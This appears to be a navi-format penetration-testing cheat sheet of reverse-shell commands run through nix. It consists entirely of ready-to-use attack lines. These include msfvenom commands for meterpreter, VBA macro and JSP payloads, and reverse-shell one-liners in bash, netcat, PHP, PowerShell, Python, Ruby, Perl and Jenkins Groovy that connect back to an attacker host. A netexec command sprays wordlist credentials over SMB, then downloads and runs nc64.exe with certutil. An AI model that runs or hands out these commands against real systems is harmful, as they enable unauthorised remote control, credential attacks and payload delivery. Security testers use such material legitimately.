% rev shells cheats

$ port: echo '9001 443 80 1234 4444 32000' | tr ' ' '\n'
$ adapters: ip a | grep -P '^\d*:' | grep -v 'veth\|br-\|lo\|docker' | cut -d ' ' -f 2 | tr -d ':' | cut -d '@' -f 1
$ IP: ip -o -4 addr show scope global 2>/dev/null | awk '{print $4}' | cut -d/ -f1; printf '%s\n' 127.0.0.1
$ target: { [ -f scope.txt ] && tr '[:space:]' '\n' < scope.txt | sed '/^$/d'; printf '%s\n' 127.0.0.1; } | sort -u
$ user-list: find "$(pwd)" "$(nix build --impure --no-link --print-out-paths nixpkgs#seclists)/share/wordlists/seclists" "$(nix build --impure --no-link --print-out-paths nixpkgs#wordlists)/share/wordlists" -type f 2>/dev/null | sort -u
$ pass-list: find "$(pwd)" "$(nix build --impure --no-link --print-out-paths nixpkgs#seclists)/share/wordlists/seclists" "$(nix build --impure --no-link --print-out-paths nixpkgs#wordlists)/share/wordlists" -type f 2>/dev/null | sort -u
$ shell: printf '%s\n' /bin/bash /bin/sh bash sh | tr ' ' '\n'



# x86 normal
nix shell --impure -I nixpkgs=channel:nixos-unstable nixpkgs#metasploit -c msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<port> -f exe

# x64 (CMD Single Stage)
nix shell --impure -I nixpkgs=channel:nixos-unstable nixpkgs#metasploit -c msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<port> -f exe

# reverse HTTP
nix shell --impure -I nixpkgs=channel:nixos-unstable nixpkgs#metasploit -c msfvenom -p windows/meterpreter/reverse_http LHOST=<IP> LPORT=<port> -f exe

# reverse HTTPS
nix shell --impure -I nixpkgs=channel:nixos-unstable nixpkgs#metasploit -c msfvenom -p windows/meterpreter/reverse_https LHOST=<IP> LPORT=<port> -f exe

# Powershell Payload
nix shell --impure -I nixpkgs=channel:nixos-unstable nixpkgs#metasploit -c msfvenom -p cmd/windows/reverse_powershell LHOST=<IP> LPORT=<port>

# Macro Payload
nix shell --impure -I nixpkgs=channel:nixos-unstable nixpkgs#metasploit -c msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<port> -f vba

# JSP rev shell (msfvenom)
nix shell --impure -I nixpkgs=channel:nixos-unstable nixpkgs#metasploit -c msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<port> -f raw

# Bash RevShell
nix shell --impure -I nixpkgs=channel:nixos-unstable nixpkgs#bash -c bash -i >& /dev/tcp/<IP>/<port> 0>&1

# Netcat OpenBsd RevShell [nc-mkfifo]
nix shell --impure -I nixpkgs=channel:nixos-unstable nixpkgs#coreutils -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <port> >/tmp/f

# Minimal PHP Rev Shell
nix shell --impure -I nixpkgs=channel:nixos-unstable nixpkgs#php -c php -r '$sock=fsockopen("<IP>",<port>);exec("/bin/bash -i ".chr(60)."&3 >&3 2>&3");'

# nc plain Rev Shell
nix shell --impure -I nixpkgs=channel:nixos-unstable nixpkgs#netcat -c nc -e /bin/bash <IP> <port>

# Windows PowerShell RevShell
nix shell --impure -I nixpkgs=channel:nixos-unstable nixpkgs#powershell -c pwsh -NoP -NonI -W Hidden -Exec Bypass -Command 'New-Object System.Net.Sockets.TCPClient("<IP>",<port>); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2  = $sendback + "PS " + (pwd).Path + "> "; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()};$client.Close()'

# Python Rev Shell
nix shell --impure -I nixpkgs=channel:nixos-unstable nixpkgs#python3 -c python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",<port>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

# Ruby Rev Shell
nix shell --impure -I nixpkgs=channel:nixos-unstable nixpkgs#ruby -c ruby -rsocket -e'f=TCPSocket.open("<IP>",<port>).to_i;exec sprintf("/bin/sh -i " + 60.chr + "&%d >&%d 2>&%d",f,f,f)'

# netexec (windows specific) download nc64.exe from your (tun0 port 80, webserver, revshell on port 443) box and execute it.
nix shell --impure -I nixpkgs=channel:nixos-unstable nixpkgs#netexec -c nxc smb <target> -u <user-list> -d <target> -p <pass-list> -X "certutil.exe -urlcache -split -f http://<IP>/nc64.exe nc64.exe; .\nc64.exe <IP> 443 -e powershell.exe";

# Jenkins Rev Shell [Groovy Script]
String host=<IP>;int port=<port>;String cmd="sh";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

# Perl Rev Shell
nix shell --impure -I nixpkgs=channel:nixos-unstable nixpkgs#perl -c perl -e 'use Socket;$i="<IP>";$p=<port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("<shell> -i");};'
